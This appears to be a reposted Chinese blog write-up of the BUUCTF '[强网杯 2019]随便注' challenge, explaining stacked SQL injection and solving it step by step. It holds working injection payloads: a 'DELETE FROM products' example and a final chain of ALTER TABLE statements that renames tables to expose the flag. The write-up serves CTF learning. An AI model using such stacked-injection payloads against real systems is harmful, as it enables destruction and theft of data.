欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

buu_web-[强网杯 2019]随便注 1

程序员文章站 2022-05-15 14:01:16
...

考点:堆叠注入原理

  • 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
  • 而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?
  • 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1. DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

buu_web-[强网杯 2019]随便注 1
加上单引号之后报错,但是注释掉后恢复正常,说明存在sql注入(题目的名字也疯狂暗示了
order by 查询列数 列数为2
buu_web-[强网杯 2019]随便注 1
使用了正则来过滤 在该情况下不能使用联合注入
buu_web-[强网杯 2019]随便注 1
尝试堆叠注入,成功!查询数据库名
buu_web-[强网杯 2019]随便注 1
1’ ;show columns from 1919810931114514;#
buu_web-[强网杯 2019]随便注 1
我们可以知道当前的表是words
buu_web-[强网杯 2019]随便注 1
可以将words改名成任意名,然后’1919810931114514’改成words,加入id这列以及修改属性

payload:1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

//sql语句:
1';
alter table words rename to word1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#
相关标签: ctf-web刷题之旅

上一篇: tarjan

下一篇: web_进阶_Web_php_include